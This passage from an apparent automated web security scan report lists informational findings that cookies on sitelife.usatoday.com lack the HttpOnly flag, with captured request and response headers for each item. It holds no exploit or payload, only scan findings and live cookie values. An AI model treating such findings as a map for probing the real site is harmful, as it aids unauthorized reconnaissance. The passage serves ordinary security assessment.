Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 378
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a...................Sk.....J.-g..V.U.....D..q...o..]....S...........v...........v..<.J$.-........h.[..............................................................................................
...[SNIP]...

14.113. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 606
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

GIF89a.............................................................}..t..k.`.\|.Yx.au._u._t.Ut.]q.Pq.Ml.Tk.Pg}Ih.Mg.Jd}Fe.GazBa.E_xI_tC^wG]r=^}E]uA[u?Zs@ZtAZq8Yy=Wq5Uv:Tn8Sl7Qk0Pr3Nh+Mm/Je8IZ6GX,Gb4
...[SNIP]...

14.114. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 618
Content-Type: image/gif
Last-Modified: Wed, 31 Aug 2011 20:08:11 GMT
Accept-Ranges: bytes
ETag: "1ea694b51968cc1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:25 GMT
Connection: close

GIF89a................[..\..^.._..?..C..E..G..H..I..J..K..L..N..P..R..T..U..V..W..X..Y..~...........3..>..E..F..a..c..d..d..i...........................................................................
...[SNIP]...

14.115. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/checkplayer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/checkplayer.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 9326
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:18 GMT
Connection: close

/*    CheckPlayer 1.0.2 <http://checkplayer.flensed.com/>
   Copyright (c) 2008 Kyle Simpson, Getify Solutions, Inc.
   This software is released under the MIT License <http://www.opensource.org/licenses/m
...[SNIP]...

14.116. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/flXHR.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/flXHR.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: usatprod=R1449690983; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 12759
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:18 GMT
Connection: close

/*    flXHR 1.0.5 <http://flxhr.flensed.com/> | Copyright (c) 2008-2010 Kyle Simpson, Getify Solutions, Inc. | This software is released under the MIT License <http://www.opensource.org/licenses/mit-lice
...[SNIP]...

14.117. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/flensed.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/flensed.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 3823
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:19 GMT
Connection: close

/*    flensedCore 1.0 <http://www.flensed.com/>
   Copyright (c) 2008 Kyle Simpson, Getify Solutions, Inc.
   This software is released under the MIT License <http://www.opensource.org/licenses/mit-license
...[SNIP]...

14.118. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 3384
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:19 GMT
Connection: close

/*    jQuery.flXHRproxy 1.2.2 <http://flxhr.flensed.com/>
   Copyright (c) 2009 Kyle Simpson
   This software is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
   
   Thi
...[SNIP]...

14.119. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 761
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:18 GMT
Connection: close

/**
* jQuery.XHR
* Copyright (c) 2008 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
* Date: 8/7/2008
*
* @projectDescription Re
...[SNIP]...

14.120. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/swfobject.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 9763
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2011 20:08:09 GMT
Accept-Ranges: bytes
ETag: "80dafbb31968cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:19 GMT
Connection: close

/* SWFObject v2.1 <http://code.google.com/p/swfobject/>
   Copyright (c) 2007-2008 Geoff Stearns, Michael Williams, and Bobby van der Sluis
   This software is released under the MIT License <http://www
...[SNIP]...

14.121. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/pluckApps.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/pluckApps.js?skipCSS=true HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 185752
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 08:35:45 GMT
Accept-Ranges: bytes
ETag: "80c61179146acc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:16 GMT
Connection: close


(function(window,undefined){var jQuery=function(selector,context){return new jQuery.fn.init(selector,context);},_jQuery=window.jQuery,_$=window.$,document=window.document,rootjQuery,quickExpr=/^[^<]
...[SNIP]...

14.122. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Stats/Tracker.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: usatprod and SiteLifeHost. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that SiteLifeHost is set with domain=usatoday.com, so browsers send it to every usatoday.com host rather than only to sitelife.usatoday.com.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&plckUserId=null&plckGcid=Pluck4&plckCurrentTime=1315096975548 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: usatprod=R1449690983; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:42:18 GMT
Connection: close


14.123. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/content/ua/css/pluckAll.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: usatprod. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/ua/css/pluckAll.css HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 163000
Content-Type: text/css
Last-Modified: Sat, 03 Sep 2011 08:35:49 GMT
Accept-Ranges: bytes
ETag: "8020747b146acc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:42:15 GMT
Connection: close

.pluck-css-loaded{border-bottom-color:#010204}p.pluck-error-message{color:#c33}p.pluck-confirm-message,.pluck-score-em{color:#c63}a.pluck-primary-button,span.pluck-confirm-btn a,.pluck-login-comment-i
...[SNIP]...

14.124. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: usatprod and SiteLifeHost. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that SiteLifeHost is set with domain=usatoday.com, so browsers send it to every usatoday.com host rather than only to sitelife.usatoday.com.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 43017
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:44:38 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

14.125. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/comments/comments.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: usatprod and SiteLifeHost. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that SiteLifeHost is set with domain=usatoday.com, so browsers send it to every usatoday.com host rather than only to sitelife.usatoday.com.

Request

GET /ver1.0/usat/pluck/comments/comments.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 37055
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 08:35:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

// Plugin to contain scripts frequently used across multiple widgets
// Minipersona, report abuse, that sort of thing.
pluckAppProxy.registerPlugin("pluck/comments/comments.js",
// init function, c
...[SNIP]...

14.126. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/pluck.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: usatprod and SiteLifeHost. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Note that SiteLifeHost is set with domain=usatoday.com, so browsers send it to every usatoday.com host rather than only to sitelife.usatoday.com.

Request

GET /ver1.0/usat/pluck/pluck.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
